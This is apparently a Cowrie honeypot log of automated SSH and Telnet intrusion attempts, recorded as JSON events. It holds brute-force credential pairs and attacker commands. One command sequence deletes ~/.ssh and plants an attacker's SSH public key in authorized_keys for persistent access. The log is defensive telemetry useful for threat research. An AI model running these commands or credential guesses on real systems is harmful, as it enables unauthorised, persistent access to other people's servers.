{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":54564,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8c669acabe3","protocol":"ssh","message":"New connection: 103.12.154.87:54564 (1.2.3.4:22) [session: a8c669acabe3]","sensor":"my-vps","timestamp":"2025-08-26T06:44:37.711494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:44:37.713290Z","src_ip":"103.12.154.87","session":"a8c669acabe3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:44:37.930846Z","src_ip":"103.12.154.87","session":"a8c669acabe3"}
{"eventid":"cowrie.login.failed","username":"elk","password":"elk","message":"login attempt [elk/elk] failed","sensor":"my-vps","timestamp":"2025-08-26T06:44:38.786133Z","src_ip":"103.12.154.87","session":"a8c669acabe3"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:44:40.003338Z","src_ip":"103.12.154.87","session":"a8c669acabe3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40434,"dst_ip":"1.2.3.4","dst_port":23,"session":"2208791ed9b4","protocol":"telnet","message":"New connection: 212.227.125.160:40434 (1.2.3.4:23) [session: 2208791ed9b4]","sensor":"my-vps","timestamp":"2025-08-26T06:44:47.661327Z"}
{"eventid":"cowrie.session.closed","duration":1.0549707412719727,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:44:48.716219Z","src_ip":"212.227.125.160","session":"2208791ed9b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40440,"dst_ip":"1.2.3.4","dst_port":23,"session":"38666cd816e5","protocol":"telnet","message":"New connection: 212.227.125.160:40440 (1.2.3.4:23) [session: 38666cd816e5]","sensor":"my-vps","timestamp":"2025-08-26T06:44:48.891145Z"}
{"eventid":"cowrie.session.closed","duration":4.146042823791504,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:44:53.037096Z","src_ip":"212.227.125.160","session":"38666cd816e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40460,"dst_ip":"1.2.3.4","dst_port":23,"session":"70ecb57a478d","protocol":"telnet","message":"New connection: 212.227.125.160:40460 (1.2.3.4:23) [session: 70ecb57a478d]","sensor":"my-vps","timestamp":"2025-08-26T06:44:53.222560Z"}
{"eventid":"cowrie.session.closed","duration":1.109309434890747,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:44:54.331803Z","src_ip":"212.227.125.160","session":"70ecb57a478d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40474,"dst_ip":"1.2.3.4","dst_port":23,"session":"0ff53b69fb90","protocol":"telnet","message":"New connection: 212.227.125.160:40474 (1.2.3.4:23) [session: 0ff53b69fb90]","sensor":"my-vps","timestamp":"2025-08-26T06:44:54.513381Z"}
{"eventid":"cowrie.session.closed","duration":1.2732930183410645,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:44:55.786598Z","src_ip":"212.227.125.160","session":"0ff53b69fb90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40080,"dst_ip":"1.2.3.4","dst_port":23,"session":"a499f9b3f23b","protocol":"telnet","message":"New connection: 212.227.125.160:40080 (1.2.3.4:23) [session: a499f9b3f23b]","sensor":"my-vps","timestamp":"2025-08-26T06:44:55.941183Z"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T06:44:57.156954Z","src_ip":"212.227.125.160","session":"a499f9b3f23b"}
{"eventid":"cowrie.session.closed","duration":3.2545573711395264,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:44:59.195662Z","src_ip":"212.227.125.160","session":"a499f9b3f23b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40086,"dst_ip":"1.2.3.4","dst_port":23,"session":"3068420b0b6e","protocol":"telnet","message":"New connection: 212.227.125.160:40086 (1.2.3.4:23) [session: 3068420b0b6e]","sensor":"my-vps","timestamp":"2025-08-26T06:44:59.354225Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"VnT3ch@dm1n","message":"login attempt [admin/VnT3ch@dm1n] failed","sensor":"my-vps","timestamp":"2025-08-26T06:45:01.209746Z","src_ip":"212.227.125.160","session":"3068420b0b6e"}
{"eventid":"cowrie.session.closed","duration":4.272367477416992,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:45:03.626449Z","src_ip":"212.227.125.160","session":"3068420b0b6e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40090,"dst_ip":"1.2.3.4","dst_port":23,"session":"3011cd6f5a2a","protocol":"telnet","message":"New connection: 212.227.125.160:40090 (1.2.3.4:23) [session: 3011cd6f5a2a]","sensor":"my-vps","timestamp":"2025-08-26T06:45:03.785640Z"}
{"eventid":"cowrie.login.failed","username":"telnet","password":"telnet","message":"login attempt [telnet/telnet] failed","sensor":"my-vps","timestamp":"2025-08-26T06:45:05.652657Z","src_ip":"212.227.125.160","session":"3011cd6f5a2a"}
{"eventid":"cowrie.session.closed","duration":4.1396777629852295,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:45:07.925251Z","src_ip":"212.227.125.160","session":"3011cd6f5a2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51406,"dst_ip":"1.2.3.4","dst_port":23,"session":"f434550639e3","protocol":"telnet","message":"New connection: 212.227.125.160:51406 (1.2.3.4:23) [session: f434550639e3]","sensor":"my-vps","timestamp":"2025-08-26T06:45:08.363288Z"}
{"eventid":"cowrie.login.success","username":"root","password":"86981198","message":"login attempt [root/86981198] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:45:09.003777Z","src_ip":"212.227.125.160","session":"f434550639e3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:45:09.080671Z","src_ip":"212.227.125.160","session":"f434550639e3"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T06:45:09.406005Z","src_ip":"212.227.125.160","session":"f434550639e3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:45:10.531905Z","src_ip":"212.227.125.160","session":"f434550639e3"}
{"eventid":"cowrie.session.closed","duration":2.173011064529419,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:45:10.536176Z","src_ip":"212.227.125.160","session":"f434550639e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54113,"dst_ip":"1.2.3.4","dst_port":22,"session":"50fca475bb1d","protocol":"ssh","message":"New connection: 212.227.235.229:54113 (1.2.3.4:22) [session: 50fca475bb1d]","sensor":"my-vps","timestamp":"2025-08-26T06:45:52.805695Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:45:52.806395Z","src_ip":"212.227.235.229","session":"50fca475bb1d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:45:53.207588Z","src_ip":"212.227.235.229","session":"50fca475bb1d"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":52628,"dst_ip":"1.2.3.4","dst_port":22,"session":"607fcfe728b1","protocol":"ssh","message":"New connection: 103.12.154.87:52628 (1.2.3.4:22) [session: 607fcfe728b1]","sensor":"my-vps","timestamp":"2025-08-26T06:45:56.055262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:45:56.059021Z","src_ip":"103.12.154.87","session":"607fcfe728b1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:45:56.260510Z","src_ip":"103.12.154.87","session":"607fcfe728b1"}
{"eventid":"cowrie.login.failed","username":"ts3server","password":"ts3server","message":"login attempt [ts3server/ts3server] failed","sensor":"my-vps","timestamp":"2025-08-26T06:45:57.123611Z","src_ip":"103.12.154.87","session":"607fcfe728b1"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:45:58.243436Z","src_ip":"212.227.235.229","session":"50fca475bb1d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:45:58.347739Z","src_ip":"103.12.154.87","session":"607fcfe728b1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51730,"dst_ip":"1.2.3.4","dst_port":22,"session":"7232d8174306","protocol":"ssh","message":"New connection: 217.72.205.35:51730 (1.2.3.4:22) [session: 7232d8174306]","sensor":"my-vps","timestamp":"2025-08-26T06:46:02.168496Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:46:02.169967Z","src_ip":"217.72.205.35","session":"7232d8174306"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58154,"dst_ip":"1.2.3.4","dst_port":22,"session":"609abb675a51","protocol":"ssh","message":"New connection: 212.227.235.229:58154 (1.2.3.4:22) [session: 609abb675a51]","sensor":"my-vps","timestamp":"2025-08-26T06:46:18.492947Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:46:18.493949Z","src_ip":"212.227.235.229","session":"609abb675a51"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:46:18.885399Z","src_ip":"212.227.235.229","session":"609abb675a51"}
{"eventid":"cowrie.login.success","username":"root","password":"zxc1230.","message":"login attempt [root/zxc1230.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:46:23.046224Z","src_ip":"212.227.235.229","session":"609abb675a51"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:46:23.515506Z","src_ip":"212.227.235.229","session":"609abb675a51"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:46:23.516622Z","src_ip":"212.227.235.229","session":"609abb675a51"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:46:23.518093Z","src_ip":"212.227.235.229","session":"609abb675a51"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:46:23.739475Z","src_ip":"212.227.235.229","session":"609abb675a51"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:46:24.272814Z","src_ip":"212.227.235.229","session":"609abb675a51"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T06:46:24.273575Z","src_ip":"212.227.235.229","session":"609abb675a51"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T06:46:24.491852Z","src_ip":"212.227.235.229","session":"609abb675a51"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:46:24.492998Z","src_ip":"212.227.235.229","session":"609abb675a51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59006,"dst_ip":"1.2.3.4","dst_port":22,"session":"77c4733c6e1c","protocol":"ssh","message":"New connection: 212.227.235.229:59006 (1.2.3.4:22) [session: 77c4733c6e1c]","sensor":"my-vps","timestamp":"2025-08-26T06:46:24.826582Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:46:24.827448Z","src_ip":"212.227.235.229","session":"77c4733c6e1c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:46:25.156709Z","src_ip":"212.227.235.229","session":"77c4733c6e1c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T06:46:26.100601Z","src_ip":"212.227.235.229","session":"77c4733c6e1c"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:46:27.477783Z","src_ip":"212.227.235.229","session":"77c4733c6e1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59456,"dst_ip":"1.2.3.4","dst_port":22,"session":"39cd7383f796","protocol":"ssh","message":"New connection: 212.227.235.229:59456 (1.2.3.4:22) [session: 39cd7383f796]","sensor":"my-vps","timestamp":"2025-08-26T06:46:27.899311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:46:27.900079Z","src_ip":"212.227.235.229","session":"39cd7383f796"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:46:28.274981Z","src_ip":"212.227.235.229","session":"39cd7383f796"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:46:29.844039Z","src_ip":"212.227.235.229","session":"39cd7383f796"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:46:30.064783Z","src_ip":"212.227.235.229","session":"39cd7383f796"}
{"eventid":"cowrie.session.closed","duration":"11.7","message":"Connection lost after 11.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:46:30.207741Z","src_ip":"212.227.235.229","session":"609abb675a51"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":50690,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bd956198afe","protocol":"ssh","message":"New connection: 103.12.154.87:50690 (1.2.3.4:22) [session: 0bd956198afe]","sensor":"my-vps","timestamp":"2025-08-26T06:47:13.964230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:47:13.973715Z","src_ip":"103.12.154.87","session":"0bd956198afe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gc